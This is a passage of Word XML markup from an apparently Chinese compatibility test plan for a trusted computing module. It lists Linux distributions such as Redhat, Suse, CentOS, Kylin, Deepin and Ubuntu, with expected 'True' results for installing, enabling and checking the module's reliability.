                <w:numId w:val="36"/>
              </w:numPr>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>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可信计算模块可靠性</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="6A934D0E" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:hRule="exact" w:val="585"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2422" w:type="dxa"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="059BCD2E" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2751" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="451B0533" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>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Redhat7.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2586" w:type="dxa"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="38A344CD" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="2A669D39" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:hRule="exact" w:val="585"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2422" w:type="dxa"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2FFFF119" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2751" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="08D10BDA" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>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Suse12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2586" w:type="dxa"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="56C04D69" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="6A76468A" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:hRule="exact" w:val="585"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2422" w:type="dxa"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3DAA52A6" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2751" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4A3173F5" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>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Centos</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2586" w:type="dxa"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="663A6D0C" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="Style2"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="420" w:hanging="420"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="6FBDDE7E" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:hRule="exact" w:val="585"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2422" w:type="dxa"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="567D0C86" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2751" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="16565C34" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>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麒麟系统</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2586" w:type="dxa"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0A1C0379" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="11F6BF2C" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:hRule="exact" w:val="605"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2422" w:type="dxa"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="620D880D" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2751" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3C29335D" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00751612" w:rsidP="00A5661A">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId124" w:tgtFrame="/Users/zwj/Documents\x/_blank" w:history="1">
              <w:r w:rsidR="00C55A9C" w:rsidRPr="003914A3">
                <w:rPr>
                  <w:rStyle w:val="af3"/>
                  <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="Arial"/>
                  <w:color w:val="000000" w:themeColor="text1"/>
                  <w:sz w:val="18"/>
                  <w:szCs w:val="18"/>
                  <w:u w:val="none"/>
                  <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                </w:rPr>
                <w:t>Deepin</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00C55A9C" w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="Arial"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>（深度）</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13A44C0E" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2586" w:type="dxa"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="210683B0" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4210B25B" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-2"/>
      </w:pPr>
      <w:bookmarkStart w:id="438" w:name="_Toc36487993"/>
      <w:bookmarkStart w:id="439" w:name="_Toc36573261"/>
      <w:bookmarkStart w:id="440" w:name="_Toc36630347"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>测试数据需求</w:t>
      </w:r>
      <w:bookmarkEnd w:id="438"/>
      <w:bookmarkEnd w:id="439"/>
      <w:bookmarkEnd w:id="440"/>
    </w:p>
    <w:p w14:paraId="15972FD1"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提前准备好测试需要用的Linux系统的机器。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="641227D6" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-2"/>
      </w:pPr>
      <w:bookmarkStart w:id="441" w:name="_Toc36487994"/>
      <w:bookmarkStart w:id="442" w:name="_Toc36573262"/>
      <w:bookmarkStart w:id="443" w:name="_Toc36630348"/>
      <w:r w:rsidRPr="00536672">
        <w:t>兼容性</w:t>
      </w:r>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>测试结果分析方法和预期</w:t>
      </w:r>
      <w:r w:rsidRPr="00536672">
        <w:t>结果</w:t>
      </w:r>
      <w:bookmarkEnd w:id="441"/>
      <w:bookmarkEnd w:id="442"/>
      <w:bookmarkEnd w:id="4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2"/>
        <w:gridCol w:w="2496"/>
        <w:gridCol w:w="2035"/>
        <w:gridCol w:w="2035"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="4B540716" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:hRule="exact" w:val="637"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1572" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="278F1E73" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:b/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:b/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>场景</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2496" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="388FF639" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:b/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:b/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>执行策略</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:b/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>（安装及运行）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2035" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="05E5B763" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:b/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:b/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>预期结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2035" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="58B8F9CD" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:b/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:b/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="1A2BFECF" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:hRule="exact" w:val="637"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1572" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="71A0BA1F"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color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>将安装不同的Linux操作系统的机器，安装可信模块，添加到</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>server的可信列表</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2496" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3E111D04" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:jc w:val="left"/>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lastRenderedPageBreak/>
              <w:t>Ubuntu14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2035" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3192EFB5" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="Style2"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>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True</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2035" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6D02B0A4" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:pStyle w:val="Style2"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="36"/>
              </w:numPr>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>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可信计算模块安装</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B3F8522" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:pStyle w:val="Style2"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="36"/>
              </w:numPr>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>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可信计算模块开启</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6EE31F13" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:pStyle w:val="Style2"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="36"/>
              </w:numPr>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>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lastRenderedPageBreak/>
              <w:t>可信计算模块可靠性</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="5DFF9D95" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:hRule="exact" w:val="637"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1572" w:type="dxa"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="24DB1C0D" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2496" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="04CFD1D4" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>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Redhat7.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2035" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="33B160D9"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i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>True</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2035" w:type="dxa"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="36DD2C77" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="15038196" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:hRule="exact" w:val="637"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1572" w:type="dxa"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="324D3A7E" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2496" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="57C9B3B0" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>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Suse12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2035" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6FFF3E73"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i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>True</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2035" w:type="dxa"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2E0BC7FA" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="42DE3905" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:hRule="exact" w:val="637"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1572" w:type="dxa"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="428F2112" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2496" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="07F4979E" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>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Centos</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2035" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4D694756" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="Style2"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="420" w:hanging="420"/>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True</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2035" w:type="dxa"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5AE29E42" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="Style2"/>
